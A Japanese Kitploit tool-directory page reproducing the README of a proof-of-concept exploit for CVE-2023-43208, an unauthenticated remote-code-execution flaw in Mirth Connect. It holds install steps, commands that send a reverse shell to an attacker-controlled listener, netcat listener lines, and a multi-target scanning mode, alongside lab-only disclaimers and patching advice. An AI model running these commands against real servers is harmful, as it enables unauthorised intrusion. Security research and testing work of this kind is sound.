Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PoC-2023-43208 — CVE-2023-43208(Mirth Connect バージョン4.4.1以前におけるリモートコード実行の脆弱性)の概念実証エクスプロイト。 | Kitploit
ツール/GitHubGitHub/mkirahmet/poc-2023-43208
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubmkirahmet/poc-2023-43208

PoC-2023-43208

CVE-2023-43208(Mirth Connect バージョン4.4.1以前におけるリモートコード実行の脆弱性)の概念実証エクスプロイト。

リポジトリを見る
316ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-43208-EXPLOIT

Mirth Connect リモートコード実行(RCE)エクスプロイト

Python Version Version CVE Lab Use Only

⚠️ 教育およびラボ使用専用 ⚠️

CVE-2023-43208 の概念実証エクスプロイト。バージョン 4.4.1 未満の Mirth Connect におけるリモートコード実行の脆弱性です。

🚨 重要な法的免責事項

このツールの使用は厳格に以下に限定されます:

  • 🧪 教育目的
  • 🔬 ラボ環境における許可されたセキュリティテスト
  • 📚 サイバーセキュリティ研究と学習

使用禁止:

  • ❌ 自分が所有していないシステムに対して
  • ❌ 明示的な書面による許可なし
  • ❌ 本番環境において
  • ❌ 違法または悪意のある目的

すべての該当する法律および規制を遵守する責任はあなたにあります。このツールの誤用は刑事告訴につながる可能性があります。

📋 説明

このエクスプロイトは Mirth Connect の /api/users エンドポイントにおける XML デシリアライゼーション脆弱性を標的としており、影響を受けるバージョン(< 4.4.1)で認証なしのリモートコード実行を可能にします。

これは CRITICAL(重大)な脆弱性であり、隔離されたラボ環境で自分のシステムに対してのみテストすべきです。

🔧 必要条件

  • Python 3.7 以上
  • requirements.txt に記載された必要なパッケージ
  • 脆弱な Mirth Connect インスタンスがあるラボ環境

🚀 インストール

root@kitploit:~
# リポジトリのクローン
git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git
cd CVE-2023-43208-EXPLOIT

# 依存関係のインストール
pip install -r requirements.txt

💻 使用方法(ラボ使用専用)

インタラクティブモード(ラボ推奨)

root@kitploit:~
python exploit.py

コマンドラインモード

root@kitploit:~
# 単一ターゲットのエクスプロイト(ラボ使用専用)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444

# ファイルから複数ターゲットをスキャン(ラボ使用専用)
python exploit.py -f targets.txt -t 50 -o vulnerable.txt

# 非インタラクティブモード(ラボ使用専用)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive

オプション

root@kitploit:~
-u, --url       ターゲットURL(ラボ使用専用)
-lh, --lhost    リスニングホスト(自分のIP)
-lp, --lport    リスニングポート
-f, --file      スキャンするターゲットURLを含むファイル
-o, --output    スキャン結果を保存する出力ファイル
-t, --threads   スキャンのスレッド数(デフォルト: 50)
--no-interactive 非インタラクティブモードで実行

🎯 ラボ環境の例

ラボをセットアップ:

  1. 隔離されたVMに脆弱な Mirth Connect バージョン(< 4.4.1)をインストール
  2. 制御されたネットワークを使用(例:VirtualBox/VMware の NAT/ホストオンリー)
  3. インターネットに絶対に露出させない

リスナーを起動:

root@kitploit:~
ncat -lnvp 4444
# または
nc -lnvp 4444

ラボ内でエクスプロイトを実行:

root@kitploit:~
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444

🧪 テスト環境の要件

  • 隔離されたネットワーク/VLAN
  • 仮想マシンのみ
  • 本番データなし
  • 外部アクセスをブロックするファイアウォールルール
  • 適切な許可が文書化されていること

📝 技術詳細

  • 脆弱性タイプ: XML デシリアライゼーション RCE
  • 影響を受けるバージョン: Mirth Connect < 4.4.1
  • 修正バージョン: 4.4.1 以上
  • CVSS スコア: 9.8(Critical)
  • 攻撃ベクトル: ネットワーク
  • 認証: 不要

このエクスプロイトは Commons Collections ガジェットを使用して /api/users エンドポイントを通じて RCE を達成します。

🛡️ 保護対策

もし Mirth Connect を実行している場合:

  • ✅ バージョン 4.4.1 以降にアップデート
  • ✅ 管理インターフェースへのネットワークアクセスを制限
  • ✅ 適切な認証を実装
  • ✅ 不審な XML ペイロードを監視

👥 クレジット

  • オリジナル作者: K3ysTr0K3R & Chocapikk
  • 修正: M0h4
  • CVE: CVE-2023-43208

⚠️ 最終警告

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  このツールはラボ使用専用です                                  ║
║  許可なく使用することは違法かつ非倫理的です                      ║
║  すべてのリスクと責任はあなたが負います                          ║
║  作者は誤用に対する一切の責任を負いません                        ║
╚══════════════════════════════════════════════════════════════╝
ツールをダウンロード